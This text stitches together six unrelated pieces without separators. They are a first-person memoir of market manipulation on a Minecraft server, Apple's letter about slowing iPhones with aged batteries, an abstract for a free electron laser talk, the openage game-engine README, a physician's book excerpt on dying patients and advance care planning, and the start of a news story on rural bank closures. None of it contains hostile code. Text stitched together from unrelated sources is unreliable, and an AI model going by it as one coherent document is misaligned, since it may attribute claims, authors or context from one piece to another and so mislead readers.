Diamonds being not the most valuable but certainly the most valued item in the game, both for their utility and their price stability, the server was littered with buy chests for them. These were mostly of the wing-and-a-prayer sort, offering prices low enough that anyone selling to them was a noob or a fool. But not so low that I couldn't sell them Charlotte's. I bought from her all I could afford, bankrupted every single person who had a buy chest at any price, then went back for more. Buy chests in the market shops, scattered on the roadsides, nestled in secluded towns no one remembered the names of, I hit them all. If you were buying diamonds at the bottom of the ocean, I would find you and take all of your money.

At the same time, I dropped my sell price in the market to 16M and did pretty good business for a few weeks. I had the advantage of one of the two best plots there were, the other belonging to Emma. (This I'd gotten via inside knowledge that Zel's to-be partner was shuttering his store and gifting the plot to a friend. I offered to swap my plot as the gift, help with the deconstruction process, and advise on pricing in the Emporium in exchange, thus getting the prized location without it ever going up for sale.) QuickShop provided a console command to show the closest shop selling an item, and these two plots, though behind hedge walls and not immediately visible, were the closest as the crow flies to the market's warp-in point. So anyone using the command--and this was most people, traipsing through the market looking for deals being a rare activity mostly limited to speculators--got directed to me or Emma for anything either of us sold.

This all made me a lot of money. I drove a portion of profits into bolstering my diamond and beacon reserves, bought basically any building material I thought I'd ever need in bulk, and still watched my marble balance grow. Up til the diamond bonanza, I'd been making money on a dozen different side hustles. A bit here, a bit there, doing better than most, but regardless the day-in day-out of working the market took up the majority of my time on the game. That made me rich; this is what made me wealthy.

But soon 16M became 14M, and 14M became 12M. A few people started to notice Charlotte's store, and she restocked faster than I, or anyone, could recoup enough to buy out. Mostly though, it was clear to everyone the price of diamond was falling, even if they had no idea why. I diversified into selling enchanted diamond equipment of all types, priced just so that I could break even on the enchant and move the component diamonds at the same price I sold them for raw. A few of the buy chest people I'd tanked tried to recover some of their money by putting the diamonds I'd sold them back up at a loss, but they still couldn't move product faster than a trickle. Eventually even Charlotte had to cut her prices to keep selling. It was bad.

Not long after, the admin I'd spoken to before came back to me saying she discovered the dupe glitch, Charlotte was tempbanned and her items revoked, and it would be greatly appreciated if I could please turn over any diamonds I got from her that I had left in exchange for the price I'd paid so they may be destroyed. Of course I agreed. I'd made out like a bandit already, and at that point, like poor old JP Morgan during the Panic of 1907, was more concerned with the state of the economy as a whole, that left uncorrected it might render everything I now held worthless. (I did however neglect to mention the wither skulls.) I could not resist telling her I told her so.

But the damage was done. The only reason you couldn't say the economy was in freefall was because all that remained was a stain on the ground. Many players who'd harvested and traded only did so to reduce the time they spent mining for diamond, and the game's equivalent of middle-class affluence was steady access to diamond tools. At first the abundance of diamond must have seemed like a boon to people who long had to struggle to get enough to sustain their needs. But mining diamonds to sell was also the primary way most knew to make money with which to buy building materials, thus the purchasing power of the vast majority plummeted alongside its price. (Diamonds are rare in the ground and as such have a Skinner box sort of reward-feedback loop when uncovered, which makes them for many players the most enjoyable thing to farm. The things I did to make my first tens of thousands--digging clay out of riverbeds, gathering lilypads from swamps--were more lucrative but less exciting, and as such I was the only one who did them.)

In this way, diamond was the linchpin of the entire system, so when its price bottomed out, everything else went with it. Nothing you could gather and sell was worth the money you'd get for it. And even if it was, nothing you'd want to buy with that money was available for purchase. Everyone on the server was reduced to subsistence, forced to harvest everything they might need. Even those of us with real money, once our stockpiles of raw materials started to dwindle, had to dig more out of the dirt like a bunch of scrubs. The entire market was as illiquid as a Weichselian glacier.

And then Samantha came back.

Temple to the ancestors, just east of the inner city.

Gonna Buy With a Little Help From My Friends

Samantha, naturally, was horrified by the state of affairs upon her return. I mean, we all were. We thought the problem was just too massive to manage on our own, that the only thing we could do was keep playing the game and hope it worked itself out over time. Samantha didn't.

Aside from our vast reserves of raw goods, Emma and I each had several hundred thousand marbles, Victoria a bit less, Samantha a bit more. Samantha intimated to us that she intended to spend her entire fortune clearing the market of diamond and that we should join her in this endeavor. What she understood immediately, which we were initially wary to gamble on, was that while it seemed like there was more diamond out there than anyone could buy, much of it was already in plain view. No one else was holding onto serious reserves, not like ours, so all we had to do was shoulder the initial investment. We could swoop in and acquire all that there was to be had before anyone knew what was happening. They'd dump what they held once they saw there were buyers again, seeing it as a rare opportunity, not understanding our aim was to push the price past what we were paying. Then we'd become the primary suppliers for the server and quickly start making our money back, which we could then use to force up the prices of everything else. Anyway, the worst that could happen was that we'd end up with too much of the most useful item in the game.

We set up a private group on a messaging app and invited a half dozen or so other people. Zel, Lily, people with some amount of assets who we knew worked the market strategically and had a vested interest in dragging it back from the brink. Minor players by comparison to us four, but it was good to have everyone on the same page. Diamond was still in the 6M range; we decided the new price would be 18M.

Samantha went first. She swept through the market buying out every single person with diamond to sell, then set up a buy chest at 12M and announced it to the server. People flocked to it, fighting to fill it up, and each time they did, she happily emptied it out so they could do it again. They all thought this was a windfall, a once in a lifetime shot to offload the accursed stones for more than they were worth, a boon offered by a wealthy eccentric just off a long break and looking to throw her fortune away. Soon enough, Samantha was tapped out, down to her last marble.

We waited a few days for the people she'd bought out to restock, the people who thought they missed out to put all they had up for sale in the hopes that it might move after all. At the designated time, we all moved our price to 18M and picked up where she left off, snapping up anything less than that and ferreting it away for later. It took just about all the money we had. I was down below 10k for the first time since a couple months after I started playing, and I wasn't the only one. We barely managed to pull it off, but we did it.

When it was just Samantha buying, it looked like an individual whim. Now that it was all of us, it was obvious to those paying attention that this was organized. But it didn't matter. By the time people figured out they'd been had, we had all there was to be had. They went through their stages of grief, then they started buying from us again. Just like Samantha said.

Rumors swirled about a cabal of players manipulating the market, abusing their wealth to force a change that everyone else could only go along with. We coyly denied the whole thing, a wink and a smile, "Wow, wouldn't that be something if there was, hm?" They called us the diamond cartel. We called ourselves the Minecraft Illuminati.

Once we started making diamond money again, there was nothing that we couldn't do. No other item was duped so prolifically, and nothing available in comparable quantities came near its per-item cost. We were free to set the prices we pleased and had both the resources and the hubris to enforce them over any objection. Gold and coal up fivefold, wood and obsidian up ten. And every time we raised a price, our daily incomes went up higher.

There were no restraints anymore. We could do whatever we wanted. It was our server. Everyone else was just playing on it.

View of the market district from above.

A Whole New World

Eventually enough plugins updated for 1.7 that the admins decided it was time to update. This was known as the biome update, so named because it added dozens of new environment types and radically altered worldgen. Which meant that to take advantage of the new content, the server would be wiped, and everyone would start over.

In an attempt to prevent a repeat of the previous world, where a tiny clique of players achieved dizzying wealth at the expense of all the others, some measures were put in place to stymie our ambitions. An aggressive tax, scaling to multiple percent per day, on anyone holding more than a few tens of thousands of marbles. I warned this would backfire, that it would lead to pervasive hoarding and diamond as de facto alternative money, wildly distorting the market all to avoid taxation. This is exactly what happened: the price of diamond shot up relative to everything else, chronic shortages meant most players couldn't buy it at all, and those of us making big trades preferred to denominate in it rather than in the official currency. I even considered standardizing a redstone contraption that would dispense a selectable number of items for every diamond inserted, but never got around to it.
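To see why the tax warped things so badly, here's a rough illustration; the 2% daily rate and 30,000M threshold are stand-ins for whatever the real figures were:

```python
# Why big marble balances fled into diamond: a daily percentage levy compounds
# fast. The 2%/day rate and 30,000M exemption here are stand-in numbers.
def after_tax(balance, days, rate=0.02, threshold=30_000):
    for _ in range(days):
        taxable = max(0.0, balance - threshold)
        balance -= rate * taxable
    return balance

print(round(after_tax(300_000, 30)))   # ~177,000M left after a month of taxes
# A chest full of diamonds pays no tax, so that's where the wealth went.
```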

Meanwhile, in part to deal with the often intolerable lag of thousands of shop chests in one place, in part to reduce its grip on the daily flow of the game, the market was split up into four smaller areas. On the old server it had been one large, flat area, with square plots arranged in a grid, easy to browse and all conveniently located in one place. The new markets were pre-built structures laid out like model villages, with upstairs and downstairs, back entrances, none with the same layout, confusing to navigate and widely dispersed. Victoria came up with the idea of building our own market: unlike on the old server, we could build something with more utility than the official option and thus supplant it. We called it the Skymall: a pair of giant discs perched up at cloud level atop two massive pillars, shops arranged inside around their circumferences, connected by skybridge and easily accessible via nether portal just outside of spawn. Once we got established on the new server (which didn't take long) we plowed all our resources into this project for weeks. The Skymall opened to great fanfare; we sold out of storefronts within days, and it soon became the destination of choice for anyone heading to market.

But none of it had the same savor. The joy of my first run was starting from zero, knowing nothing of the server and little of the game, building my knowledge graph, learning, experimenting, getting results. The diamond cartel was our most audacious gamble, but it was still an unknown until we pulled it off. On the new server, everything felt rote. I scouted out a skeleton spawner and built an experience grinder my first day or two, got my enchanted diamond, constructed a 50-furnace autosmelter and a passive iron farm. I felt as a dreary Harappan, building things I'd already built time and again, without any inventiveness, any spark.

Once, when I wrote about all this in a different format, someone mentioned that online games don't necessarily have the same sort of stagnancy and barriers put up offline by entrenched, generational wealth. You can roll everyone back to zero and the selfsame people will get rich all over again. This is quite true. Part of it surely is many people don't like to play games the way we do. But much of it is you either have the time, skill, knowledge, and drive to work the angles and make your way to the top, or you don't. Making back our money wasn't just easy, it was trivial. Even with a leveled playing field, we raced ahead of everyone else. And then, one by one, we started to lose interest and drop off.

There's a skill curve to games like Europa Universalis where you start off bewildered by the multitudes of inscrutable systems laid out in front of you. Over time you learn to manage them, and the game shifts from something that seems to happen to you, to something you can participate in and compete with. But eventually you learn it well enough to find the cracks. With so much complexity, there are always oversights, always gamebreaking tactics, ways to grind the AI into dust. You have complete control over the game world, can effect any end you want. And then it becomes about building a story.

With Minecraft, with the economy, for us, there was no story to tell. There was only money.


A Message to Our Customers about iPhone Batteries and Performance


We’ve been hearing feedback from our customers about the way we handle performance for iPhones with older batteries and how we have communicated that process. We know that some of you feel Apple has let you down. We apologize. There’s been a lot of misunderstanding about this issue, so we would like to clarify and let you know about some changes we’re making.

First and foremost, we have never — and would never — do anything to intentionally shorten the life of any Apple product, or degrade the user experience to drive customer upgrades. Our goal has always been to create products that our customers love, and making iPhones last as long as possible is an important part of that.

How batteries age

All rechargeable batteries are consumable components that become less effective as they chemically age and their ability to hold a charge diminishes. Time and the number of times a battery has been charged are not the only factors in this chemical aging process.

Device use also affects the performance of a battery over its lifespan. For example, leaving or charging a battery in a hot environment can cause a battery to age faster. These are characteristics of battery chemistry, common to lithium-ion batteries across the industry.

A chemically aged battery also becomes less capable of delivering peak energy loads, especially in a low state of charge, which may result in a device unexpectedly shutting itself down in some situations.

To help customers learn more about iPhone’s rechargeable battery and the factors affecting its performance, we’ve posted a new support article, iPhone Battery and Performance.

It should go without saying that we think sudden, unexpected shutdowns are unacceptable. We don’t want any of our users to lose a call, miss taking a picture or have any other part of their iPhone experience interrupted if we can avoid it.

Preventing unexpected shutdowns

About a year ago in iOS 10.2.1, we delivered a software update that improves power management during peak workloads to avoid unexpected shutdowns on iPhone 6, iPhone 6 Plus, iPhone 6s, iPhone 6s Plus, and iPhone SE. With the update, iOS dynamically manages the maximum performance of some system components when needed to prevent a shutdown. While these changes may go unnoticed, in some cases users may experience longer launch times for apps and other reductions in performance.

Customer response to iOS 10.2.1 was positive, as it successfully reduced the occurrence of unexpected shutdowns. We recently extended the same support for iPhone 7 and iPhone 7 Plus in iOS 11.2.

Of course, when a chemically aged battery is replaced with a new one, iPhone performance returns to normal when operated in standard conditions.

Recent user feedback

Over the course of this fall, we began to receive feedback from some users who were seeing slower performance in certain situations. Based on our experience, we initially thought this was due to a combination of two factors: a normal, temporary performance impact when upgrading the operating system as iPhone installs new software and updates apps, and minor bugs in the initial release which have since been fixed.

We now believe that another contributor to these user experiences is the continued chemical aging of the batteries in older iPhone 6 and iPhone 6s devices, many of which are still running on their original batteries.

Addressing customer concerns

We’ve always wanted our customers to be able to use their iPhones as long as possible. We’re proud that Apple products are known for their durability, and for holding their value longer than our competitors’ devices.

To address our customers’ concerns, to recognize their loyalty and to regain the trust of anyone who may have doubted Apple’s intentions, we’ve decided to take the following steps:

  • Apple is reducing the price of an out-of-warranty iPhone battery replacement by $50 — from $79 to $29 — for anyone with an iPhone 6 or later whose battery needs to be replaced, starting in late January and available worldwide through December 2018. Details will be provided soon on apple.com.
  • Early in 2018, we will issue an iOS software update with new features that give users more visibility into the health of their iPhone’s battery, so they can see for themselves if its condition is affecting performance.
  • As always, our team is working on ways to make the user experience even better, including improving how we manage performance and avoid unexpected shutdowns as batteries age.

At Apple, our customers’ trust means everything to us. We will never stop working to earn and maintain it. We are able to do the work we love only because of your faith and support — and we will never forget that or take it for granted.

Free electron laser – A fourth-generation synchrotron light source [video]

media.ccc.de - Free Electron Lasers

Thorsten

Wouldn’t it be awesome to have a microscope which allows scientists to map atomic details of viruses, film chemical reactions, or study the processes in the interior of planets? Well, we’ve just built one in Hamburg. It’s not table-top, though: one billion euros and a 3 km-long tunnel are needed for such a ‘free electron laser’, also called a fourth-generation synchrotron light source. I will talk about the basic physics and some astonishing facts and figures about the operation and application of these types of particle accelerators.

Most people have heard about particle accelerators, most prominently the LHC, at which high-energy particles are brought into collision in order to study fundamental physics. In fact, however, most major particle accelerators in the world are big x-ray microscopes.

The latest and biggest of these synchrotron radiation sources is the European XFEL: a one-billion-euro free electron laser, based on superconducting accelerator technology and stretched out over 3 km beneath the city of Hamburg. The x-ray pulses it produces allow images, for example of proteins, with sub-atomic resolution and exposure times short enough to enable in-situ studies of chemical reactions.

This talk aims to explain how particle accelerators, and in particular light sources, work; why we need such big facilities to enable new types of science; and why much of modern technology would be inconceivable without them.
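
As a rough sense of the scale involved (a standard textbook relation, not taken from the talk itself): the wavelength radiated by an undulator, the periodic magnet structure at the heart of such a light source, is approximately

$$
\lambda_{\text{photon}} \simeq \frac{\lambda_u}{2\gamma^2}\left(1 + \frac{K^2}{2} + \gamma^2\theta^2\right),
$$

where $\lambda_u$ is the undulator period (a few centimetres), $\gamma$ is the electron Lorentz factor, $K$ is the dimensionless undulator strength, and $\theta$ is the observation angle. With electron energies in the tens of GeV, $\gamma$ is a few times $10^4$, so the $1/2\gamma^2$ factor compresses a centimetre-scale magnet period down to x-ray wavelengths of roughly an ångström, which is why producing hard x-rays this way takes a kilometres-long accelerator rather than a table-top device.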

Open-source clone of the Age of Empires II engine

README.md

openage: a volunteer project to create a free engine clone of the Genie Engine used by Age of Empires, Age of Empires II (HD) and Star Wars: Galactic Battlegrounds, comparable to projects like OpenMW, OpenRA, OpenTTD and OpenRCT2. At the moment we focus our efforts on the integration of Age of Empires II, while being primarily aimed at POSIX platforms such as GNU/Linux.

openage uses the original game assets (such as sounds and graphics), but (for obvious reasons) doesn't ship them. To play, you need an original AoE II: TC installation or AoE II: HD (installed via Wine or Steam for Linux).

The foundation of openage:

Technology     Component
C++14          Engine core
Python3        Scripting, media conversion, in-game console, code generation
Qt5            Graphical user interface
Cython         Glue code
CMake          Build system
OpenGL 2.1     Rendering, shaders
SDL2           Cross-platform audio/input/window handling
Opus           Audio codec
Humans         Mixing together all of the above

Our goals include:

  • Fully authentic look and feel
    • This can only be approximated, since the behaviour of the original game is mostly undocumented, and guessing/experimenting can only get you so close
    • We will not implement useless artificial limitations (max 30 selectable units...)
  • Multiplayer (obviously)
  • Matchmaking and ranking with a Haskell masterserver
  • Optionally, improvements over the original game
  • AI scripting in Python (you can even use machine learning)
  • Re-creating free game assets
  • An easily moddable content format: nyan (yet another notation)
  • An integrated Python console and API, comparable to Blender's
  • Awesome infrastructure such as our own Kevin CI service

But beware, for sanity reasons:

  • No network compatibility with the original game. You really wanna have the same problems again?
  • No binary compatibility with the original game. A one-way script to convert maps/savegames/missions to openage is planned though.

Current State of the Project

  • What features are currently implemented?

  • What's the plan?

Dependencies, Building and Running

  • How do I get this to run on my box?

  • I compiled everything. Now how do I run it?

    • The convert script will transform original assets into openage formats, which are a lot saner and more moddable.
    • Use your brain and react to the things you'll see.
  • Waaaaaah! It

    • segfaults
    • prints error messages I don't want to read
    • ate my dog

All of those are features, not bugs.

To turn them off, use ./run --dont-segfault --no-errors --dont-eat-dog.

If this still does not help, try our troubleshooting guide, the contact section or the bug tracker.

Development Process

What does openage development look like in practice?

Can I help?

All documentation is also in this repo:

  • Code documentation is embedded in the sources for Doxygen (see doc readme).
  • Have a look at the doc directory. This folder tends to become outdated as the code changes.

OS X Version

Running openage on OS X worked in the past, and might or might not work right now.

Setting up continuous integration for this platform has some complications. Running a hackintosh VM seems to be not so legal, while buying dedicated hardware for it seems to be not so cheap. If you know of a legal and cost-free way of doing so or want to sponsor a semi-recent Mac Mini, please open a ticket in our issue tracker. Until then, PRs untested on OS X will make their way into the master branch and occasional breakage will occur.

Windows Version

The Windows port of openage is under development.

Setting up continuous integration for this platform has problems similar to the OS X version. If you know of a legal and cost-free way of acquiring and running a Windows VM, please open a ticket in our issue tracker. Until then, PRs untested on Windows will make their way into the master branch and occasional breakage will occur.

Contributing

  • Being typical computer science students, we hate people.
  • Please don't contact us.
  • Nobody likes Age of Empires anyway.
  • None of you is interested in making openage more awesome anyway.
  • We don't want a community.
  • Don't even think about trying to help.

Guidelines:

  • No bug reports or feature requests, the game is perfect as is.
  • Don't try to fix any bugs, see above.
  • Don't implement any features, your code is crap.
  • Don't even think about sending a pull request.
  • Please ignore the easy tasks that could just be done.
  • Absolutely never ever participate in this boring community.
  • Don't note the irony, you idiot.

To prevent accidental violation of one of those guidelines, you should never

cheers, happy hecking.

Contact

If you have the desire to perform semi-human interaction, join our Matrix or IRC chatroom!

Do not hesitate to ping and insult us, we might not see your message otherwise.

For all technical discussion (ideas, problems, ...), use the issue tracker! It's like a mailing list.

For other discussions or questions, use our /r/openage subreddit!

License

GNU GPLv3 or later; see copying.md and legal/GPLv3.

I know that probably nobody is ever gonna look at the copying.md file, but if you want to contribute code to openage, please take the time to skim through it and add yourself to the authors list.

What We Get Wrong About Dying

My first exposure to the death of a patient came during my third year of medical school, in Israel. It was my first clinical rotation, which happened to be in internal medicine. Tagging along with my mentor, a senior physician to whom I had been assigned, on his morning rounds, I followed him into the room of an elderly woman who was critically ill with an antibiotic-resistant bacterial infection in her urinary system. The infection had spread throughout her frail body and was now wreaking havoc on most of her vital organs. Observing her for a few moments as she lay there unconscious, he said, “She’s almost at the end.”

I scrutinized the woman’s face, her breathing, the digital readouts of the instruments, trying to understand what signs he was so brilliantly interpreting. To me it seemed like voodoo, as though through some dark art he was able to peer into her very soul.

Assuming that with nothing more to do here we would move on, I began to back away toward the door. But he surprised me by pulling a chair up to the bedside, sitting down, and taking one of the woman’s limp hands in his own. I realize now that in addition to providing her with the comfort of a human touch, he was also probably assessing her pulse, feeling her skin growing cooler, judging the blood flow to her extremities. But at the time I saw it simply as a kind human gesture, all the more startling because, though so simple, it struck me as a profound part of what it means to be a healer. Even though I was only a medical student, I was already so lost in my books, so focused on physiology and on memorizing for tests, that I had forgotten for a moment what I was really training for.

“She has no family here,” he said. “Never forget, if you accompany your patients only until the battle is lost and they are dying, if you abandon them at that point and leave them alone, you have done only part of your job, and not done it well. Your job is to accompany your patients until they are either better or safely on the other side.”

What he was saying sounded vaguely familiar, but from a very different context. I was reminded of the funeral of my first grandparent to die, my maternal grandfather, when I was 15 years old. At the graveside, after the few people in attendance had each thrown the traditional shovel-full of earth into the open grave and I had moved off to the side, my father called me back.

“Take this,” he said, keeping one shovel for himself and holding the other out for me, “we have to keep going until the grave is fully covered.”

“Why?” I asked. “I already put some dirt in.” I was still in the process of absorbing the loss of my grandfather and was in no hurry to participate in something so morbid.

“There’s no one else here who can do it,” he said. “The greatest thing you can do for him now as a grandson is to help me see to it that he is fully buried by us, his own family, and not just left for strangers to fill in the grave with a tractor.”

It was incredibly difficult for me but I did it, of course, down to the last shovel-full. And the experience stayed with me.

In the hospital room with my mentor and the dying woman, I sat down in a chair on the opposite side of the bed, not yet brave enough to hold her other hand but trying to take it all in. Except for the sounds of the three of us breathing, the room was still. As the minutes passed, the woman’s breathing became slower, wetter, more ragged. And then, suddenly, it just stopped. She was gone. I had witnessed my first death.

After he checked that there was no pulse and that she was indeed deceased, my mentor notified the nurse in charge, quickly signed the death certificate, and we moved on to the next patient on our rounds.

In one respect, which I didn’t fully appreciate at the time, this was amazing. My mentor had demonstrated an incredibly valuable and, I would come to realize, incredibly difficult skill: how to be present during a death. But at the same time, I would later come to understand that he also displayed a poor adaptive response commonly seen in clinicians. He signed the certificate and moved on. That was it. To be fair, I don’t know what was going on in his head, if he was hurting inside and saving it up until after work, or if he was truly so jaded and busy that he was unaffected by the death of his patient. All I saw as a student was that the patient was dead and we were expected to move on, with no comment or reflection on what had just occurred.

My understanding then and throughout my training was that with the departure of the doctor after the death of a patient, the nursing staff takes over. They would provide support to the patient’s family and prepare the body to be moved to the hospital morgue. But as a medical student and later as a resident I had no idea what any of this entailed. It’s not part of a doctor’s training. During my pediatric oncology training the workload was so great and patient deaths so frequent, there never seemed to be time for me to even think about what happens to the body. And, in any case, I soon realized that expressing concerns about these sorts of things was neither encouraged nor supported; in fact, I worried it would be perceived as a show of weakness.

At Hadassah, as a senior physician, I finally have more of an opportunity to observe what happens after the death of a patient. Because, in accordance with their religious traditions, most Jews and Muslims want to bury their deceased before sunset on the day of death (and because both religious traditions specify the avoidance of autopsies at all costs), things tend to move pretty quickly. Family members are allowed as much time as they need in the room with the child, but in the meantime, we fill out and register a death certificate with the hospital clerks, a process that always seems fast and efficient. Israel’s bureaucracy is legendary, and Hadassah is generally no exception, but somehow the issuing of the death certificate always moves along quickly. It’s almost as if there is a recognition that something terribly sad has occurred, and that the usual bureaucratic shenanigans of daily life at Hadassah should be set aside to allow a bereaved family to proceed swiftly and peacefully to their loved one’s funeral.

Once the family has had some time alone in the room, we suggest that they step out so that we can clean the body. This is different from the ritual washing that the body will undergo once it has been transported to the appropriate burial society. But our washing and cleaning does take on its own special aura of ritual, and it’s almost as if families recognize that there is something sacred about this final act that we carry out for our patients. Even the Haredi families, usually so protective of their own, allow us this special role. Death can be messy, even when peaceful. It may involve bleeding or the loss of fluids from any number of tubes and openings. As we clean the body with sponges and soapy water, we wipe away stains and clean any lacerations. We remove tubes, IVs, catheters, and tape, and even occasionally sew up wounds left after the removal of tubes and instruments, so that there is no ongoing spillage as the body is moved and so that the signs of disease and treatment are minimized. I’ve always felt that this allows us to return some dignity to the patient, to erase some of the ravages of the dying process.

A still from the French film Les Sept Jours Shiva.

The first time a nurse asked me if I would help I hesitated. My job is done, my patient has passed away, why would I want to take part in something so, well, unpleasant? It was only later that I realized the invitation was not an attempt at offloading work onto me but, rather, a respectful invitation. An honor, even. Being allowed to help clean my patient’s body after his death, after my own treatments had failed, was an opportunity for me to provide one last act of kindness toward him. The patient, Dov, was a young man who had died of a progressive bone tumor. In the course of his treatment, one leg had been amputated. Despite that, the tumor had returned, spreading through his body and leaving the stump of his leg a swollen, rotting mass. The nurse caring for him very compassionately asked his family to wait outside as I went back into the room with her. Knowing what cancer can do to a person, my heart raced as I braced myself for what his exposed body might look like. She peeled back the sheets and, indeed, the stump and most of his lower body were engulfed and warped by the tumor. In several places the tumor had caused swelling and had even erupted from his body in fungus-like masses. I breathed through my mouth, afraid to smell the rotting flesh, and I focused on the nurse. She didn’t flinch once. I followed her lead as she deftly, even lovingly, removed the tubes and wires still stuck to Dov. She wiped the sweat and blood from his motionless body, rolling him from right to left and then back again, to make sure nothing was missed. Together we lifted him onto a clean sheet, slipping the soiled ones out from underneath, and wrapped him so that only his head and face showed. The whole process seemed to transform him in just a few minutes from a victim of disease and its treatments to the picture of a young man finally at rest.

What surprised me most was that the process was also transformative for me. I felt a sense of fulfillment of my responsibility to this person who had been entrusted into my care. I was not in any way more reconciled with or any less sad about the death of my patient. But I had long sensed that just walking away from my patient once he had been declared dead left some part of the work unfinished. In this preparation of Dov’s body, our staff carried out our final responsibilities to him, helping him complete his journey with dignity.

In pediatric oncology most patient deaths do not come as a complete surprise. Usually we know when the odds are worsening and our patient is heading down a path with only one realistic ending. But actually predicting how much time remains for a patient is notoriously difficult, in contrast to what you might think based on the movies when the doctor so confidently and grimly predicts that, “you’ve got six months to live.” How long a terminally ill patient has left to live may depend on a number of factors, many of which are not under our control. This makes the timing of critical discussions about decision-making and interventions incredibly important. At Hadassah, the point at which we see a child’s disease progressing despite therapy is when we typically begin discussions with the parents about what to do should something happen suddenly. We need to know what sort of resuscitation efforts should be made if a patient stops breathing (in which case the team might consider intubation and mechanical ventilation) or if her heart stops beating (in which case the team might attempt cardio-pulmonary resuscitation, or CPR). We refer to these sorts of discussions, the exploration of what the end might look like and what interventions make the most sense to a family, as advance care planning.

One issue that gets in the way of preparing for these possibilities is our Western culture’s near-obsessive insistence on death as a discrete, identifiable moment. This may be a convenient way of viewing death for a number of reasons—for legal and administrative purposes, such as registering time of death and tracking data, or psychologically, as a way of quantifying death as a thing that we can then plan to stave off and “defeat.” But death is not always so simple, so quantifiable. I now suspect that the first death I had witnessed in medical school, which I experienced as “here one minute, gone the next,” was far more complex than I was able to appreciate at the time. The reason my mentor had us stay with his dying patient that day was probably that he saw that the dying process had already begun. All of my clinical experience since those early days as a student has only strengthened my sense that death is a process, and not just a moment in time.

Most religious and spiritual traditions seem to recognize this as well, and often do a better job of accommodating this reality than our own medical system does. Within the Jewish tradition, for example, there is a specific term, goseis, used to indicate a person who is what the medical profession calls “actively dying,” who doctors believe has no more than hours or days left to live. According to kabalistic traditions, the soul of the departed person remains present in the home during the week that the family sits shiva (which is one of the reasons the mirrors in the home are traditionally covered, so that the soul won’t experience painful reminders that it no longer has a corporeal presence). There are non-Western traditions that incorporate this concept even more overtly into their beliefs surrounding death and dying. In the Tibetan Buddhist tradition, when death appears to be approaching, holy men are brought to the bedside to chant prayers. Once the point is reached that we in the West would call “time of death,” the holy men continue praying for three more days, which is considered to be a time of active transition for the spirit from one state to the next.

The inability, or unwillingness, to recognize death as a process inevitably leads to problems with having advance care planning discussions. Advance care planning doesn’t mean “giving up” on a patient and stopping all forms of treatment. It simply means talking through with the patient and family members the “what-ifs” before a crisis ensues, and discussing in a relatively calm setting what procedures are most in line with the family’s goals and religious or philosophical values. It doesn’t mean that a patient has to stop hoping for a remission or even for a cure, or stop pursuing active treatments. It just means preparing for other, more likely, possibilities. But however logical and reasonable this may seem in the abstract, pursuing this type of conversation is for many reasons often difficult for everyone—clinicians, patients, and families alike.

Clinicians are human beings too, and they can sometimes engage in their own form of denial regarding signs of progressive disease or impending death in their patients. Or they may feel that this type of conversation is an acknowledgement of their own failure. They may worry that an unintended outcome of the conversation will be the loss of hope on the part of the patient and family. Whatever the reason, this is a difficult conversation for clinicians to initiate. They often avoid it by saying that the family “isn’t there yet,” in other words, isn’t ready to face the possibility that their child will not be cured of her disease. But not having these conversations early enough may lead to unnecessary suffering by both the patient and her family, with death occurring amidst a panicked, hurried mess of regrets over things left unsaid, and comfort-oriented options not pursued. And all too often the family is, indeed, “there”; they’re just waiting for the clinical team to open the discussion. The timing of advance care planning discussions can be tricky and, much like identifying a time of death, it can be difficult to identify a moment or trigger for starting the discussion.

There are better and worse ways to navigate these discussions. The clunkiest and possibly worst consists of a clinician laying out to parents the options of “doing everything” versus “just making the child comfortable.” Unfortunately, this is sometimes how things are presented. It suggests, erroneously, that parents are faced with an “either/or” proposition: We will make your child feel comfortable, or we will use extraordinary measures to try to keep her alive. Worse yet, we lay this unnecessary decision squarely on the ill-prepared shoulders of bewildered, grief-stricken parents. Alternatively, these conversations could happen in the context of a long-term relationship that has been established between the clinician and the family, during which a family’s goals, values, and expectations have been thought through. In these instances, clinicians are able to provide guidance to parents on decision-making and to suggest that, based on a family’s beliefs or goals, there might be certain procedures or interventions that should or should not be done. This is often where a palliative care team can be helpful, especially if they have been introduced early enough and have developed a relationship with the child and her family.

Advance care planning is another realm where the rabbinic authorities in Israel play a major role, especially when it comes to the Haredi population. In an ideal world, communication between a patient’s rabbi and the medical team would be seamless, everyone working together to explore goals, hopes, and fears in order to come up with a plan that is both medically and religiously or culturally appropriate for a given family. But in reality that sort of relationship rarely materializes. Our medical determinations and suggestions are more often sketchily conveyed by heartbroken parents to rabbis who can therefore have at best only a limited understanding of the patient’s medical situation and prognosis. And so when we have advance care conversations with these families, what we most often hear is “the rabbi says that as long as there is life we must do everything possible.” Though it sounds definitive, there is an ambiguity in this response. Some clinicians will take this statement at face value and interpret it to mean that every attempt at resuscitation should be made no matter what. This will sometimes result in clinicians performing painful and pointless procedures on a dying child as weeping parents stand by, watching their child’s final moments in horror, having not understood what they were signing on for. But sometimes clinicians will dig deeper, sensing that there are unresolved issues inherent in the statement. What is “everything,” they may ask? And when does “life” actually end? When is an action considered a reasonable intervention and when is it considered excessive and futile? When might an intervention actually fall into a category that is beyond “everything?” Often in my experience at Hadassah, when parents witness their child dying, when they see that the final moments are truly at hand, if we have developed a trusting relationship with them and have been engaging in these discussions over time, they tell us that attempting resuscitative efforts that are likely to be futile is not consistent with their values. In these situations, rather than asking for intubation and chest compressions, parents just want to hold their child and find meaning in those final moments of contact.

Elisha Waldman is associate chief, division of pediatric palliative care, at the Ann and Robert H. Lurie Children’s Hospital of Chicago. He received his bachelor’s degree from Yale University and his medical degree from the Sackler School of Medicine in Tel Aviv. His writing has appeared in Bellevue Literary Review and the Hill.

From the book: This Narrow Space by Elisha Waldman. Copyright © 2018 by Elisha Waldman. Published by arrangement with Schocken Books, an imprint of the Knopf Doubleday Publishing Group, a division of Penguin Random House LLC.

Decline of Rural Lending Crimps Small-Town Business

ROXOBEL, N.C.—Danielle Baker wanted a $324,000 loan last year to expand the peanut-processing business she ran from the family farm. She had a longstanding relationship with the Roxobel branch of Southern Bank, and she thought Southern would help fund the peanut operation she had spun off, too.

But that branch—the town’s only bank—closed in 2014. A Southern banker based in Ahoskie, 19 miles away, said Bakers’ Southern Traditions Peanuts Inc. was too small and specialized, she says. A PNC bank branch also turned her down.

“If you are not a big company with tons of assets and a big bank account,” Ms. Baker says, “they just overlook you.”

She finally got a loan from a nonprofit in Raleigh two hours away that provides financing to small businesses but not other traditional banking services. She must drive 19 miles every afternoon to make cash deposits or get change for her cash register, and expects to make a two-hour trip when she wants to refinance. Without a local branch close to her business, she says, “it’s very aggravating on a day-to-day basis.”

